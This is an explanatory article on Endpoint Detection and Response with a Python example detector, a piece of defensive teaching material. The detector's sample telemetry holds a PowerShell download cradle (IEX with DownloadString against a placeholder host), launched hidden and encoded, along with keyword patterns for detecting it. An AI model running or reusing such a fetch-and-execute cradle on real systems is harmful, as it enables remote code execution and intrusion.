Endpoint Detection and Response (EDR)
What is an Endpoint Detection and Response (EDR)?
Endpoint Detection and Response (EDR) is a class of security tooling that continuously monitors endpoints (workstations, laptops, servers, and similar devices), detects threats on them, and supports or automates the response. A sensor agent on each endpoint collects telemetry about process, file, registry, and network activity (through event logs, kernel callbacks, API hooks, and similar sources), forwards it to a central analysis platform, and that platform evaluates the behaviour in near real time against detection rules and behavioural analytics. When something suspicious is found, the EDR raises an alert with its surrounding context (process tree, command lines, timeline) and can take initial containment actions, such as terminating a process or isolating the host from the network, while an analyst investigates.
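To make the "collect behaviour, analyse it, respond" loop concrete, here is an added illustration (not code from the original article or from any EDR product) of the detection side: a small Python detector that keeps the process tree reported by a hypothetical sensor, applies two behavioural rules (an Office application spawning a shell, a shell descended from an Office application within a few hops), decodes PowerShell's `-EncodedCommand` argument to spot a download cradle, and maps the alerts to first-response actions. The events, process IDs, rule names, and action names are all constructed for the example.

```python
import base64
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record as a hypothetical EDR sensor reports it."""
    pid: int
    ppid: int
    image: str      # executable file name, lower-cased by the sensor
    cmdline: str
    user: str


@dataclass
class Alert:
    rule: str
    pid: int
    severity: str   # "high" or "medium"
    detail: str


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
          "cscript.exe", "mshta.exe"}
CRADLE_MARKERS = ("downloadstring", "invoke-expression", "iex ")


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None.

    PowerShell accepts any unambiguous prefix of the switch (-e, -ec, -enc ...)
    and the payload is base64 over UTF-16LE, so a detector has to decode it
    instead of pattern-matching the raw command line.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        t = tok.lower()
        if t.startswith("-e") and "-encodedcommand".startswith(t):
            try:
                return base64.b64decode(tokens[i + 1]).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


class Detector:
    """Holds the process tree seen so far and evaluates rules per new process."""

    def __init__(self):
        self.procs = {}   # pid -> ProcEvent
        self.alerts = []

    def ancestors(self, pid, max_hops=4):
        chain, cur = [], self.procs.get(pid)
        while cur is not None and len(chain) < max_hops:
            cur = self.procs.get(cur.ppid)
            if cur is not None:
                chain.append(cur)
        return chain

    def ingest(self, ev):
        self.procs[ev.pid] = ev
        parent = self.procs.get(ev.ppid)
        parent_is_office = parent is not None and parent.image in OFFICE_APPS

        # Rule 1: Office app directly spawning a shell/script host (macro dropper).
        if parent_is_office and ev.image in SHELLS:
            self.alerts.append(Alert("office_spawns_shell", ev.pid, "high",
                                     f"{parent.image} -> {ev.image}"))
        # Rule 2: shell deeper in the tree whose ancestor is an Office app,
        # e.g. cmd.exe launched by the PowerShell that Word launched.
        elif ev.image in SHELLS and any(
                a.image in OFFICE_APPS for a in self.ancestors(ev.pid)):
            chain = " <- ".join(a.image for a in self.ancestors(ev.pid))
            self.alerts.append(Alert("office_descendant_shell", ev.pid,
                                     "medium", chain))

        # Rule 3: decode -EncodedCommand and look for a download cradle.
        if ev.image in ("powershell.exe", "pwsh.exe"):
            decoded = decode_encoded_command(ev.cmdline)
            if decoded and any(m in decoded.lower() for m in CRADLE_MARKERS):
                self.alerts.append(Alert("encoded_download_cradle", ev.pid,
                                         "high", decoded[:80]))
        return self.alerts


def plan_response(alerts):
    """Map alerts to the automatic first-response actions (names are illustrative)."""
    per_pid = {}
    for a in alerts:
        if a.severity == "high":
            per_pid[a.pid] = "terminate_tree"
        else:
            per_pid.setdefault(a.pid, "suspend")
    host = "isolate_host" if any(a.severity == "high" for a in alerts) else "monitor"
    return per_pid, host


# Constructed telemetry: a user opens a macro document, the macro starts
# hidden PowerShell with an encoded download cradle, which then runs cmd.exe.
# A legitimate scheduled PowerShell script (pid 440) is included as a control.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
_ENC = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    ProcEvent(400, 1, "explorer.exe", "explorer.exe", "CORP\\alice"),
    ProcEvent(412, 400, "winword.exe", "WINWORD.EXE /n invoice.docm", "CORP\\alice"),
    ProcEvent(420, 412, "powershell.exe",
              "powershell.exe -nop -w hidden -enc " + _ENC, "CORP\\alice"),
    ProcEvent(433, 420, "cmd.exe", "cmd.exe /c whoami", "CORP\\alice"),
    ProcEvent(440, 400, "powershell.exe",
              "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
              "CORP\\alice"),
]


def run_sample():
    det = Detector()
    for ev in SAMPLE_EVENTS:
        det.ingest(ev)
    return det.alerts, plan_response(det.alerts)


if __name__ == "__main__":
    alerts, (per_pid, host) = run_sample()
    for a in alerts:
        print(f"[{a.severity}] {a.rule} pid={a.pid}: {a.detail}")
    print(per_pid, host)
```

The example runs offline; the "sensor" is the `SAMPLE_EVENTS` list. Two practitioner details are built in: the rules key on parent/child relationships rather than on a single process name, which is what makes behavioural detection harder to evade than file-hash matching, and the encoded command is decoded before inspection because base64-over-UTF-16LE hides every keyword from a naive string match. A real EDR would add many more rules, would evaluate them against streamed events rather than a list, and would gate destructive responses behind policy.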
The next step up from this tool is Extended Detection and Response (XDR), which works the same way but over a broader scope. Instead of endpoint telemetry alone, XDR ingests data from, and can drive responses through, multiple sources: remote applications (such as email servers), network components (such as firewalls), and more, and it correlates events across those sources so that one intrusion shows up as a single incident rather than as separate alerts per product. XDR grew out of EDR, and both can identify and stop attacks; they differ primarily in the breadth of coverage they provide.